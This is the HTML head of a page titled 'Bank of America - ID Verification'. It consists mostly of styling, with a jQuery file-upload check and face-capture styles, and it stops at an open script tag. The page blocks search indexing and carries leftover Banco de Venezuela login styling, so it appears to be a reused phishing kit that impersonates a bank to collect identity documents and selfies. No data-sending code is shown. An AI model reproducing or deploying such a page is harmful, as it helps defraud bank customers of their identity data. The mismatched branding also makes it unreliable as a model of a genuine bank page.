<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
  <head>
  <meta charset="utf-8">
  <title>Bank of America - ID Verification</title>
  <base ="/">
  <meta http-equiv="cache-control" content="max-age=0">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  <meta http-equiv="pragma" content="no-cache">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
  <meta name="robots" content="noindex, nofollow" />
  <meta name="googlebot" content="noindex, nofollow" />
  <link rel="icon" type="image/png" sizes="32x32" href="../../assets/favicon.ico">
  <meta name="msapplication-TileColor" content="#da532c">
  <meta name="theme-color" content="#ffffff">

<link rel="stylesheet" href="../assets/styles.e39c533bc86a88a7a4a4.css">
<link rel="stylesheet" href="../assets/face-onfido-5.5.0.min.dcf3a4e343d8.css">

<style>h3[_ngcontent-c0], th[_ngcontent-c0]{color:#32445b}@media print{.noprint-section[_ngcontent-c0]{display:none!important}}</style>
<style>#spinner[_ngcontent-c1]{top:0;left:0;height:100%;width:100%;position:fixed;z-index:9999;opacity:.7;background-color:#f1f1f1;display:flex;align-items:center;justify-content:center}  .colored-parent,   .colored>div{background-color:#333}</style>
<style>.sk-wave[_ngcontent-c9]{position:relative;top:50%;margin:auto;width:50px;height:40px;text-align:center;font-size:10px}.sk-wave[_ngcontent-c9]   .sk-rect[_ngcontent-c9]{float:left;margin-right:1px;height:100%;width:6px;display:inline-block;-webkit-animation:sk-waveStretchDelay 1.2s infinite ease-in-out;animation:sk-waveStretchDelay 1.2s infinite ease-in-out}.sk-wave[_ngcontent-c9]   .sk-rect1[_ngcontent-c9]{-webkit-animation-delay:-1.2s;animation-delay:-1.2s}.sk-wave[_ngcontent-c9]   .sk-rect2[_ngcontent-c9]{-webkit-animation-delay:-1.1s;animation-delay:-1.1s}.sk-wave[_ngcontent-c9]   .sk-rect3[_ngcontent-c9]{-webkit-animation-delay:-1s;animation-delay:-1s}.sk-wave[_ngcontent-c9]   .sk-rect5[_ngcontent-c9]{-webkit-animation-delay:-.8s;animation-delay:-.8s}.sk-wave[_ngcontent-c9]   .sk-rect4[_ngcontent-c9]{-webkit-animation-delay:-.9s;animation-delay:-.9s}@-webkit-keyframes sk-waveStretchDelay{0%,100%,40%{-webkit-transform:scaleY(.4);transform:scaleY(.4)}20%{-webkit-transform:scaleY(1);transform:scaleY(1)}}@keyframes sk-waveStretchDelay{0%,100%,40%{-webkit-transform:scaleY(.4);transform:scaleY(.4)}20%{-webkit-transform:scaleY(1);transform:scaleY(1)}}</style><script charset="utf-8" src="/1.39a9e954b6ab848e14db.js"></script><script charset="utf-8" src="/common.02beff9a760127801965.js"></script><script charset="utf-8" src="/42.d033ce966819f149e00c.js"></script><style>.card[_ngcontent-c10]{width:300px;position:absolute;top:50%;left:25%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);border-radius:30px}.text-center[_ngcontent-c10]{text-align:center}.text-center2[_ngcontent-c10]{text-align:center;float:left}@media (max-width:850px){.card[_ngcontent-c10]{left:50%;width:80%}}.complete[_ngcontent-c10]{text-align:center;font-size:14px}#pestanabdv[_ngcontent-c10]{background-image:url(/assets/pestana-bdv.png);width:305px!important;height:136px!important;margin-top:10%;background-repeat:no-repeat}#titulo-pestana[_ngcontent-c10]{display:block;margin-top:50px;margin-left:21px}#login[_ngcontent-c10]{background-image:url(/assets/fondo_login.JPG);background-size:100%;border-radius:10px!important;margin-left:10%}.boton-login[_ngcontent-c10]{font-size:23px;text-align:center;cursor:pointer;outline:0;color:#000;background-color:#8aa4c1!important;border:none;border-radius:30px!important;min-width:150px!important;font-weight:700!important}.boton-login[_ngcontent-c10]:active{background-color:#8aa4c1;box-shadow:0 5px #666;-webkit-transform:translateY(4px);transform:translateY(4px)}.bdvnet-login-input[_ngcontent-c10]{width:250px;padding-top:1px}.bdvnet-login-input-password[_ngcontent-c10]{width:225px;padding-top:1px}.bdvnet-login-input[_ngcontent-c10]   b[_ngcontent-c10]{color:#8aa4c1}#tarjeta[_ngcontent-c10]{margin-top:1em!important}#tarjeta-password[_ngcontent-c10]{margin-top:1.5em!important}.h4-login[_ngcontent-c10]{font-family:Helvetica,sans-serif;color:#fff!important;word-wrap:break-word!important;max-width:250px;height:auto!important;text-align:center}.cursor_eye[_ngcontent-c10]{cursor:pointer;color:#fff}@media (max-width:500px){html[_ngcontent-c10]{background-image:none;background-color:#cd352a!important}}.img1[_ngcontent-c10]{background-image:url(/assets/login/bg1.jpg/);height:100%;background-position:center;background-repeat:no-repeat;background-size:cover}@media (max-width:768px){.img1[_ngcontent-c10]{background:#932020;background:linear-gradient(0deg,rgba(147,32,32,.994835) 7%,#cc3535 21%)}}</style><style>.mat-card{transition:box-shadow 280ms cubic-bezier(.4,0,.2,1);display:block;position:relative;padding:24px;border-radius:2px}.mat-card:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px rgba(0,0,0,.2),0 2px 2px 0 rgba(0,0,0,.14),0 1px 5px 0 rgba(0,0,0,.12)}.mat-card .mat-divider{position:absolute;left:0;width:100%}[dir=rtl] .mat-card .mat-divider{left:auto;right:0}.mat-card .mat-divider.mat-divider-inset{position:static;margin:0}@media screen and (-ms-high-contrast:active){.mat-card{outline:solid 1px}}.mat-card-flat{box-shadow:none}.mat-card-actions,.mat-card-content,.mat-card-subtitle,.mat-card-title{display:block;margin-bottom:16px}.mat-card-actions{margin-left:-16px;margin-right:-16px;padding:8px 0}.mat-card-actions-align-end{display:flex;justify-content:flex-end}.mat-card-image{width:calc(100% + 48px);margin:0 -24px 16px -24px}.mat-card-xl-image{width:240px;height:240px;margin:-8px}.mat-card-footer{display:block;margin:0 -24px -24px -24px}.mat-card-actions .mat-button,.mat-card-actions .mat-raised-button{margin:0 4px}.mat-card-header{display:flex;flex-direction:row}.mat-card-header-text{margin:0 8px}.mat-card-avatar{height:40px;width:40px;border-radius:50%;flex-shrink:0}.mat-card-lg-image,.mat-card-md-image,.mat-card-sm-image{margin:-8px 0}.mat-card-title-group{display:flex;justify-content:space-between;margin:0 -8px}.mat-card-sm-image{width:80px;height:80px}.mat-card-md-image{width:112px;height:112px}.mat-card-lg-image{width:152px;height:152px}@media (max-width:599px){.mat-card{padding:24px 16px}.mat-card-actions{margin-left:-8px;margin-right:-8px}.mat-card-image{width:calc(100% + 32px);margin:16px -16px}.mat-card-title-group{margin:0}.mat-card-xl-image{margin-left:0;margin-right:0}.mat-card-header{margin:-8px 0 0 0}.mat-card-footer{margin-left:-16px;margin-right:-16px}}.mat-card-content>:first-child,.mat-card>:first-child{margin-top:0}.mat-card-content>:last-child:not(.mat-card-footer),.mat-card>:last-child:not(.mat-card-footer){margin-bottom:0}.mat-card-image:first-child{margin-top:-24px}.mat-card>.mat-card-actions:last-child{margin-bottom:-16px;padding-bottom:0}.mat-card-actions .mat-button:first-child,.mat-card-actions .mat-raised-button:first-child{margin-left:0;margin-right:0}.mat-card-subtitle:not(:first-child),.mat-card-title:not(:first-child){margin-top:-4px}.mat-card-header .mat-card-subtitle:not(:first-child){margin-top:-8px}.mat-card>.mat-card-xl-image:first-child{margin-top:-8px}.mat-card>.mat-card-xl-image:last-child{margin-bottom:-8px}</style>
<style type="text/css">
@media (min-width: 600px), (max-width: 599px), (min-width: 960px), (max-width: 959px), (min-width: 1280px), (max-width: 1279px), (min-width: 1920px), (max-width: 1920px), (min-width: 0px) and (max-width: 599px), (min-width: 600px) and (max-width: 959px), (min-width: 960px) and (max-width: 1279px), (min-width: 1280px) and (max-width: 1919px), (min-width: 1920px) and (max-width: 5000px) {.fx-query-test{ }}</style>
<style>.mat-form-field{display:inline-block;position:relative;text-align:left}[dir=rtl] .mat-form-field{text-align:right}.mat-form-field-wrapper{position:relative}.mat-form-field-flex{display:inline-flex;align-items:baseline;width:100%}.mat-form-field-prefix,.mat-form-field-suffix{white-space:nowrap;flex:none}.mat-form-field-prefix .mat-icon,.mat-form-field-suffix .mat-icon{width:1em}.mat-form-field-prefix .mat-icon-button,.mat-form-field-suffix .mat-icon-button{font:inherit;vertical-align:baseline}.mat-form-field-prefix .mat-icon-button .mat-icon,.mat-form-field-suffix .mat-icon-button .mat-icon{font-size:inherit}.mat-form-field-infix{display:block;position:relative;flex:auto;min-width:0;width:180px}.mat-form-field-label-wrapper{position:absolute;left:0;box-sizing:content-box;width:100%;height:100%;overflow:hidden;pointer-events:none}.mat-form-field-label{position:absolute;left:0;font:inherit;pointer-events:none;width:100%;white-space:nowrap;text-overflow:ellipsis;overflow:hidden;transform:perspective(100px);-ms-transform:none;transform-origin:0 0;transition:transform .4s cubic-bezier(.25,.8,.25,1),color .4s cubic-bezier(.25,.8,.25,1),width .4s cubic-bezier(.25,.8,.25,1);display:none}[dir=rtl] .mat-form-field-label{transform-origin:100% 0;left:auto;right:0}.mat-form-field-can-float.mat-form-field-should-float .mat-form-field-label,.mat-form-field-empty.mat-form-field-label{display:block}.mat-form-field-autofill-control:-webkit-autofill+.mat-form-field-label-wrapper .mat-form-field-label{display:none}.mat-form-field-can-float .mat-form-field-autofill-control:-webkit-autofill+.mat-form-field-label-wrapper .mat-form-field-label{display:block;transition:none}.mat-input-server:focus+.mat-form-field-placeholder-wrapper .mat-form-field-placeholder,.mat-input-server[placeholder]:not(:placeholder-shown)+.mat-form-field-placeholder-wrapper .mat-form-field-placeholder{display:none}.mat-form-field-can-float .mat-input-server:focus+.mat-form-field-placeholder-wrapper .mat-form-field-placeholder,.mat-form-field-can-float .mat-input-server[placeholder]:not(:placeholder-shown)+.mat-form-field-placeholder-wrapper .mat-form-field-placeholder{display:block}.mat-form-field-label:not(.mat-form-field-empty){transition:none}.mat-form-field-underline{position:absolute;height:1px;width:100%}.mat-form-field-disabled .mat-form-field-underline{background-position:0;background-color:transparent}.mat-form-field-underline .mat-form-field-ripple{position:absolute;top:0;left:0;width:100%;height:2px;transform-origin:50%;transform:scaleX(.5);visibility:hidden;opacity:0;transition:background-color .3s cubic-bezier(.55,0,.55,.2)}.mat-form-field-invalid:not(.mat-focused) .mat-form-field-underline .mat-form-field-ripple{height:1px}.mat-focused .mat-form-field-underline .mat-form-field-ripple,.mat-form-field-invalid .mat-form-field-underline .mat-form-field-ripple{visibility:visible;opacity:1;transform:scaleX(1);transition:transform .3s cubic-bezier(.25,.8,.25,1),opacity .1s cubic-bezier(.25,.8,.25,1),background-color .3s cubic-bezier(.25,.8,.25,1)}.mat-form-field-subscript-wrapper{position:absolute;width:100%;overflow:hidden}.mat-form-field-label-wrapper .mat-icon,.mat-form-field-subscript-wrapper .mat-icon{width:1em;height:1em;font-size:inherit;vertical-align:baseline}.mat-form-field-hint-wrapper{display:flex}.mat-form-field-hint-spacer{flex:1 0 1em}.mat-error{display:block}</style><style>.mat-input-element{font:inherit;background:0 0;color:currentColor;border:none;outline:0;padding:0;margin:0;width:100%;max-width:100%;vertical-align:bottom;text-align:inherit}.mat-input-element:-moz-ui-invalid{box-shadow:none}.mat-input-element::-ms-clear,.mat-input-element::-ms-reveal{display:none}.mat-input-element[type=date]::after,.mat-input-element[type=datetime-local]::after,.mat-input-element[type=datetime]::after,.mat-input-element[type=month]::after,.mat-input-element[type=time]::after,.mat-input-element[type=week]::after{content:' ';white-space:pre;width:1px}.mat-input-element::placeholder{transition:color .4s .133s cubic-bezier(.25,.8,.25,1)}.mat-input-element::-moz-placeholder{transition:color .4s .133s cubic-bezier(.25,.8,.25,1)}.mat-input-element::-webkit-input-placeholder{transition:color .4s .133s cubic-bezier(.25,.8,.25,1)}.mat-input-element:-ms-input-placeholder{transition:color .4s .133s cubic-bezier(.25,.8,.25,1)}.mat-form-field-hide-placeholder .mat-input-element::placeholder{color:transparent!important;transition:none}.mat-form-field-hide-placeholder .mat-input-element::-moz-placeholder{color:transparent!important;transition:none}.mat-form-field-hide-placeholder .mat-input-element::-webkit-input-placeholder{color:transparent!important;transition:none}.mat-form-field-hide-placeholder .mat-input-element:-ms-input-placeholder{color:transparent!important;transition:none}textarea.mat-input-element{resize:vertical;overflow:auto}textarea.mat-autosize{resize:none}</style><style>.mat-select{display:inline-block;width:100%;outline:0}.mat-select-trigger{display:inline-table;cursor:pointer;position:relative;box-sizing:border-box}.mat-select-disabled .mat-select-trigger{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:default}.mat-select-value{display:table-cell;max-width:0;width:100%;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.mat-select-value-text{white-space:nowrap;overflow:hidden;text-overflow:ellipsis}.mat-select-arrow-wrapper{display:table-cell;vertical-align:middle}.mat-select-arrow{width:0;height:0;border-left:5px solid transparent;border-right:5px solid transparent;border-top:5px solid;margin:0 4px}.mat-select-panel{min-width:112px;max-width:280px;overflow:auto;-webkit-overflow-scrolling:touch;padding-top:0;padding-bottom:0;max-height:256px;min-width:100%}.mat-select-panel:not([class*=mat-elevation-z]){box-shadow:0 5px 5px -3px rgba(0,0,0,.2),0 8px 10px 1px rgba(0,0,0,.14),0 3px 14px 2px rgba(0,0,0,.12)}@media screen and (-ms-high-contrast:active){.mat-select-panel{outline:solid 1px}}.mat-select-panel .mat-optgroup-label,.mat-select-panel .mat-option{font-size:inherit;line-height:3em;height:3em}.mat-form-field-type-mat-select:not(.mat-form-field-disabled) .mat-form-field-flex{cursor:pointer}.mat-form-field-type-mat-select .mat-form-field-label{width:calc(100% - 18px)}.mat-select-placeholder{transition:color .4s .133s cubic-bezier(.25,.8,.25,1)}.mat-form-field-hide-placeholder .mat-select-placeholder{color:transparent;transition:none}</style><style>.mat-option{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;display:block;line-height:48px;height:48px;padding:0 16px;text-align:left;text-decoration:none;position:relative;cursor:pointer;outline:0;display:flex;flex-direction:row;max-width:100%;box-sizing:border-box;align-items:center}.mat-option[disabled]{cursor:default}[dir=rtl] .mat-option{text-align:right}.mat-option .mat-icon{margin-right:16px;vertical-align:middle}[dir=rtl] .mat-option .mat-icon{margin-left:16px;margin-right:0}.mat-option[aria-disabled=true]{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:default}.mat-optgroup .mat-option:not(.mat-option-multiple){padding-left:32px}[dir=rtl] .mat-optgroup .mat-option:not(.mat-option-multiple){padding-left:16px;padding-right:32px}.mat-option-text{display:inline-block;flex-grow:1;overflow:hidden;text-overflow:ellipsis}.mat-option-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}@media screen and (-ms-high-contrast:active){.mat-option-ripple{opacity:.5}}.mat-option-pseudo-checkbox{margin-right:8px}[dir=rtl] .mat-option-pseudo-checkbox{margin-left:8px;margin-right:0}</style><style>.mat-button,.mat-flat-button,.mat-icon-button,.mat-stroked-button{box-sizing:border-box;position:relative;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:pointer;outline:0;border:none;-webkit-tap-highlight-color:transparent;display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:88px;line-height:36px;padding:0 16px;border-radius:2px}.mat-button[disabled],.mat-flat-button[disabled],.mat-icon-button[disabled],.mat-stroked-button[disabled]{cursor:default}.mat-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-button.cdk-program-focused .mat-button-focus-overlay,.mat-flat-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-flat-button.cdk-program-focused .mat-button-focus-overlay,.mat-icon-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-icon-button.cdk-program-focused .mat-button-focus-overlay,.mat-stroked-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-stroked-button.cdk-program-focused .mat-button-focus-overlay{opacity:1}.mat-button::-moz-focus-inner,.mat-flat-button::-moz-focus-inner,.mat-icon-button::-moz-focus-inner,.mat-stroked-button::-moz-focus-inner{border:0}.mat-button .mat-button-focus-overlay,.mat-icon-button .mat-button-focus-overlay{transition:none;opacity:0}.mat-button:hover .mat-button-focus-overlay,.mat-stroked-button:hover .mat-button-focus-overlay{opacity:1}.mat-raised-button{box-sizing:border-box;position:relative;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:pointer;outline:0;border:none;-webkit-tap-highlight-color:transparent;display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:88px;line-height:36px;padding:0 16px;border-radius:2px;transform:translate3d(0,0,0);transition:background .4s cubic-bezier(.25,.8,.25,1),box-shadow 280ms cubic-bezier(.4,0,.2,1)}.mat-raised-button[disabled]{cursor:default}.mat-raised-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-raised-button.cdk-program-focused .mat-button-focus-overlay{opacity:1}.mat-raised-button::-moz-focus-inner{border:0}.mat-raised-button:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px rgba(0,0,0,.2),0 2px 2px 0 rgba(0,0,0,.14),0 1px 5px 0 rgba(0,0,0,.12)}.mat-raised-button:not([disabled]):active:not([class*=mat-elevation-z]){box-shadow:0 5px 5px -3px rgba(0,0,0,.2),0 8px 10px 1px rgba(0,0,0,.14),0 3px 14px 2px rgba(0,0,0,.12)}.mat-raised-button[disabled]{box-shadow:none}.mat-stroked-button{border:1px solid currentColor;padding:0 15px;line-height:34px}.mat-stroked-button:not([class*=mat-elevation-z]){box-shadow:0 0 0 0 rgba(0,0,0,.2),0 0 0 0 rgba(0,0,0,.14),0 0 0 0 rgba(0,0,0,.12)}.mat-flat-button:not([class*=mat-elevation-z]){box-shadow:0 0 0 0 rgba(0,0,0,.2),0 0 0 0 rgba(0,0,0,.14),0 0 0 0 rgba(0,0,0,.12)}.mat-fab{box-sizing:border-box;position:relative;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:pointer;outline:0;border:none;-webkit-tap-highlight-color:transparent;display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:88px;line-height:36px;padding:0 16px;border-radius:2px;transform:translate3d(0,0,0);transition:background .4s cubic-bezier(.25,.8,.25,1),box-shadow 280ms cubic-bezier(.4,0,.2,1);min-width:0;border-radius:50%;width:56px;height:56px;padding:0;flex-shrink:0}.mat-fab[disabled]{cursor:default}.mat-fab.cdk-keyboard-focused .mat-button-focus-overlay,.mat-fab.cdk-program-focused .mat-button-focus-overlay{opacity:1}.mat-fab::-moz-focus-inner{border:0}.mat-fab:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px rgba(0,0,0,.2),0 2px 2px 0 rgba(0,0,0,.14),0 1px 5px 0 rgba(0,0,0,.12)}.mat-fab:not([disabled]):active:not([class*=mat-elevation-z]){box-shadow:0 5px 5px -3px rgba(0,0,0,.2),0 8px 10px 1px rgba(0,0,0,.14),0 3px 14px 2px rgba(0,0,0,.12)}.mat-fab[disabled]{box-shadow:none}.mat-fab:not([class*=mat-elevation-z]){box-shadow:0 3px 5px -1px rgba(0,0,0,.2),0 6px 10px 0 rgba(0,0,0,.14),0 1px 18px 0 rgba(0,0,0,.12)}.mat-fab:not([disabled]):active:not([class*=mat-elevation-z]){box-shadow:0 7px 8px -4px rgba(0,0,0,.2),0 12px 17px 2px rgba(0,0,0,.14),0 5px 22px 4px rgba(0,0,0,.12)}.mat-fab .mat-button-wrapper{padding:16px 0;display:inline-block;line-height:24px}.mat-mini-fab{box-sizing:border-box;position:relative;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:pointer;outline:0;border:none;-webkit-tap-highlight-color:transparent;display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:88px;line-height:36px;padding:0 16px;border-radius:2px;transform:translate3d(0,0,0);transition:background .4s cubic-bezier(.25,.8,.25,1),box-shadow 280ms cubic-bezier(.4,0,.2,1);min-width:0;border-radius:50%;width:40px;height:40px;padding:0;flex-shrink:0}.mat-mini-fab[disabled]{cursor:default}.mat-mini-fab.cdk-keyboard-focused .mat-button-focus-overlay,.mat-mini-fab.cdk-program-focused .mat-button-focus-overlay{opacity:1}.mat-mini-fab::-moz-focus-inner{border:0}.mat-mini-fab:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px rgba(0,0,0,.2),0 2px 2px 0 rgba(0,0,0,.14),0 1px 5px 0 rgba(0,0,0,.12)}.mat-mini-fab:not([disabled]):active:not([class*=mat-elevation-z]){box-shadow:0 5px 5px -3px rgba(0,0,0,.2),0 8px 10px 1px rgba(0,0,0,.14),0 3px 14px 2px rgba(0,0,0,.12)}.mat-mini-fab[disabled]{box-shadow:none}.mat-mini-fab:not([class*=mat-elevation-z]){box-shadow:0 3px 5px -1px rgba(0,0,0,.2),0 6px 10px 0 rgba(0,0,0,.14),0 1px 18px 0 rgba(0,0,0,.12)}.mat-mini-fab:not([disabled]):active:not([class*=mat-elevation-z]){box-shadow:0 7px 8px -4px rgba(0,0,0,.2),0 12px 17px 2px rgba(0,0,0,.14),0 5px 22px 4px rgba(0,0,0,.12)}.mat-mini-fab .mat-button-wrapper{padding:8px 0;display:inline-block;line-height:24px}.mat-icon-button{padding:0;min-width:0;width:40px;height:40px;flex-shrink:0;line-height:40px;border-radius:50%}.mat-icon-button .mat-icon,.mat-icon-button i{line-height:24px}.mat-button,.mat-fab,.mat-icon-button,.mat-mini-fab,.mat-raised-button{color:currentColor}.mat-button .mat-button-wrapper>*,.mat-fab .mat-button-wrapper>*,.mat-icon-button .mat-button-wrapper>*,.mat-mini-fab .mat-button-wrapper>*,.mat-raised-button .mat-button-wrapper>*{vertical-align:middle}.mat-button-focus-overlay,.mat-button-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}.mat-button-focus-overlay{background-color:rgba(0,0,0,.12);border-radius:inherit;opacity:0;transition:opacity .2s cubic-bezier(.35,0,.25,1),background-color .2s cubic-bezier(.35,0,.25,1)}@media screen and (-ms-high-contrast:active){.mat-button-focus-overlay{background-color:rgba(255,255,255,.5)}}.mat-button-ripple-round{border-radius:50%;z-index:1}@media screen and (-ms-high-contrast:active){.mat-button,.mat-fab,.mat-flat-button,.mat-icon-button,.mat-mini-fab,.mat-raised-button{outline:solid 1px}}</style><script charset="utf-8" src="/2.3972bb29fb3b44559b10.js"></script><script charset="utf-8" src="/41.5328bf51342e1d4259d4.js"></script><style>.container[_ngcontent-c17]{align-content:center;border-color:#000;position:relative;padding:15%}.combo[_ngcontent-c17]{background-repeat:no-repeat}.text-center[_ngcontent-c17]{text-align:center}.instruct-contract[_ngcontent-c17]{color:gray}.screen-card[_ngcontent-c17]{height:100vh}.isologo[_ngcontent-c17]{height:50px}.titles[_ngcontent-c17]   h3[_ngcontent-c17], .titles[_ngcontent-c17]   h4[_ngcontent-c17]{color:#fff!important}</style><style>.input-contrasenia[_ngcontent-c18]{max-width:70%!important}.recomendacion[_ngcontent-c18]{width:100%}.screen-card[_ngcontent-c18]{height:100vh}.mat-horizontal-stepper-content[_ngcontent-c18]{overflow:none}.step[_ngcontent-c18]{overflow:initial}.isologo[_ngcontent-c18]{height:50px}.titles[_ngcontent-c18]   h3[_ngcontent-c18], .titles[_ngcontent-c18]   h4[_ngcontent-c18]{color:#fff!important}</style><style>.mat-stepper-horizontal,.mat-stepper-vertical{display:block}.mat-horizontal-stepper-header-container{white-space:nowrap;display:flex;align-items:center}.mat-stepper-horizontal-line{border-top-width:1px;border-top-style:solid;flex:auto;height:0;margin:0 -16px;min-width:32px}.mat-horizontal-stepper-header{display:flex;height:72px;overflow:hidden;align-items:center;padding:0 24px}.mat-horizontal-stepper-header .mat-step-icon,.mat-horizontal-stepper-header .mat-step-icon-not-touched{margin-right:8px;flex:none}[dir=rtl] .mat-horizontal-stepper-header .mat-step-icon,[dir=rtl] .mat-horizontal-stepper-header .mat-step-icon-not-touched{margin-right:0;margin-left:8px}.mat-vertical-stepper-header{display:flex;align-items:center;padding:24px;max-height:24px}.mat-vertical-stepper-header .mat-step-icon,.mat-vertical-stepper-header .mat-step-icon-not-touched{margin-right:12px}[dir=rtl] .mat-vertical-stepper-header .mat-step-icon,[dir=rtl] .mat-vertical-stepper-header .mat-step-icon-not-touched{margin-right:0;margin-left:12px}.mat-horizontal-stepper-content{overflow:hidden}.mat-horizontal-stepper-content[aria-expanded=false]{height:0}.mat-horizontal-content-container{overflow:hidden;padding:0 24px 24px 24px}.mat-vertical-content-container{margin-left:36px;border:0;position:relative}[dir=rtl] .mat-vertical-content-container{margin-left:0;margin-right:36px}.mat-stepper-vertical-line::before{content:'';position:absolute;top:-16px;bottom:-16px;left:0;border-left-width:1px;border-left-style:solid}[dir=rtl] .mat-stepper-vertical-line::before{left:auto;right:0}.mat-vertical-stepper-content{overflow:hidden}.mat-vertical-content{padding:0 24px 24px 24px}.mat-step:last-child .mat-vertical-content-container{border:none}</style><style>.mat-step-header{overflow:hidden;outline:0;cursor:pointer;position:relative;box-sizing:content-box}.mat-step-optional{font-size:12px}.mat-step-icon,.mat-step-icon-not-touched{border-radius:50%;height:24px;width:24px;align-items:center;justify-content:center;display:flex}.mat-step-icon .mat-icon{font-size:16px;height:16px;width:16px}.mat-step-label{display:inline-block;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;min-width:50px;vertical-align:middle}.mat-step-text-label{text-overflow:ellipsis;overflow:hidden}.mat-step-header-ripple{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none}</style><style>.input[_ngcontent-c22]{max-width:100%!important}.recomendacion[_ngcontent-c22]{width:100%}.combo-tipo[_ngcontent-c22]{width:20%}.screen-card[_ngcontent-c22]{height:100vh}@media (max-width:850px){.screen-card[_ngcontent-c22]{width:100%}}@media (max-width:1280px){.mat-card[_ngcontent-c22]{overflow-y:auto}}@media (max-width:500px){.screen-card[_ngcontent-c22]{width:100%}}.mat-horizontal-stepper-content[_ngcontent-c22]{overflow:none}.step[_ngcontent-c22]{overflow:initial}.isologo[_ngcontent-c22]{height:50px}.titles[_ngcontent-c22]   h3[_ngcontent-c22], .titles[_ngcontent-c22]   h4[_ngcontent-c22]{color:#fff!important}mat-form-field[_ngcontent-c22]{width:100%}.allow-cp[_ngcontent-c22]{white-space:pre-line;margin-top:5px;line-height:13px;word-break:break-all}</style>
<style>
.upload-btn-wrapper {
  position: relative;
  overflow: hidden;
}
.upload-btn-wrapper input[type=file] {
  font-size: 100px;
  position: absolute;
  left: 0;
  top: 0;
  opacity: 0;
}
</style>
<style>
.custom-file-upload {
  border: 1px solid #ccc;
  display: inline-block;
  padding: 6px 12px;
  cursor: pointer;
}
#uploadFile {
  text-align: center;
  border: none;
  background-color: white;
  color: black;
}
</style>
<style>
::-webkit-input-placeholder { /* WebKit, Blink, Edge */
    color:    #4C5D76;
	font-size: 11px
}
:-moz-placeholder { /* Mozilla Firefox 4 to 18 */
   color:    #4C5D76;
   font-size: 11px
   opacity:  1;
}
::-moz-placeholder { /* Mozilla Firefox 19+ */
   color:    #4C5D76;
   font-size: 11px
   opacity:  1;
}
:-ms-input-placeholder { /* Internet Explorer 10-11 */
   color:    #4C5D76;
   font-size: 11px
}
::-ms-input-placeholder { /* Microsoft Edge */
   color:    #4C5D76;
   font-size: 11px
}

::placeholder { /* Most modern browsers support this now. */
   color:    #4C5D76;
   font-size: 11px
}
</style>
<script type="text/javascript" src="http://code.jquery.com/jquery-2.0.0.js"></script>
<script type="text/javascript">
        $(document).ready(
        function(){
            $('button:submit').attr('disabled',true);
            $('input:file').change(
                function(){
                    if ($(this).val()){
                        $('button:submit').removeAttr('disabled'); 
                    }
                    else {
                        $('button:submit').attr('disabled',true);
                    }
                });
        });
</script>

  <!--[if lt IE 9]>
  <script src="http://html5shim.googlecode.com/svn/trunk/html5-els.js"></script>
  <![endif]-->
<style>
.box {
  margin: 0 auto;
  background: rgba(255,255,255,0.2);
  padding: 15px;
  border: 2px solid #fff;
  border-radius: 20px/50px;
  background-clip: padding-box;
  align: center;
}

.button {
  font-size: 1em;
  padding: 10px;
  color: #fff;
  border: 2px solid #06D85F;
  border-radius: 20px/50px;
  text-decoration: none;
  cursor: pointer;
  transition: all 0.3s ease-out;
}
.button:hover {
  background: #06D85F;
}

.overlay {
  position: fixed;
  top: 0;
  bottom: 0;
  left: 0;
  right: 0;
  background: rgba(0, 0, 0, 0.7);
  transition: opacity 500ms;
  visibility: hidden;
  opacity: 0;
}
.overlay:target {
  visibility: visible;
  opacity: 1;
}
</style>
<script type="text/javascript">
var isMobile = /iPhone|iPad|iPod|Android/i.test(navigator.userAgent);
if (isMobile) {
	document.write('<style>.popup {margin: 30px auto;padding: 10px;background: #fff;border-radius: 5px;width: 90%;position: relative;transition: all 5s ease-in-out;}</style>');
} else {
	document.write('<style>.popup {margin: 30px auto;padding: 10px;background: #fff;border-radius: 5px;width: 50%;position: relative;transition: all 5s ease-in-out;}</style>');
}
</script>
<style>
.popup .close {
  position: absolute;
  top: 10px;
  right: 30px;
  transition: all 200ms;
  font-size: 30px;
  font-weight: bold;
  text-decoration: none;
  color: #333;
}
.popup .close:hover {
  color: #06D85F;
}
.popup .content {
  max-height: 30%;
  overflow: auto;
}
</style>
<script type="text/javascript">
var isMobile = /iPhone|iPad|iPod|Android/i.test(navigator.userAgent);
if (isMobile) {
	document.write('<style>@media screen and (max-width: 700px){.popup{width: 70%;}}</style>');
} else {
	document.write('<style>@media screen and (max-width: 700px){.box{width: 350%;}.popup{width: 70%;}}</style>');
}
</script>
<style>
video {
	margin: 0 auto;
	display: block;
	-webkit-mask-box-image: url('./mask.png');
	-webkit-mask-image: url('./mask.png');
}
</style>
<script>
